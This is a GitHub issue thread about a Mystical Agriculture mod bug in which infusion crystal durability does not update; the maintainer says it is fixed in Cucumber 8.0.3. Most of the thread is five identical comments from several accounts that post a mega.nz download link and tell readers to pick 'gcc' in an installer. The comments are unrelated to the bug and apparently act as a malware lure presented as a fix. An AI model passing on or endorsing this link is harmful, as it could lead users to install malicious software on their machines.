### ISSUE TITLE
infusion crystal durability does not change when upgrading essences

### ISSUE THREAD

**Issue by kysatwo** [BlakeBr0/MysticalAgriculture#709]
**Describe the bug**
infusion crystal durability doe not change when upgrading essences, nor does the tooltip update

**To Reproduce**
place infusing crystal in crafting table with 4x essence

**Expected behavior**
expected durability to drop by the number of produced essences and update tooltip accordingly

**Screenshots / Scripts / Logs**
N/A

**Versions (please complete the following information):**
 - Minecraft: 1.21.1
 - Forge: Neoforge 21.1.23
 - Cucumber: 8.0.1
 - Mystical Agriculture: 8.0.3
 - Mystical Agradditions: 8.0.0
 - Singleplayer or Multiplayer: single player

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by BlakeBr0** [comment]
Fixed with Cucumber 8.0.3
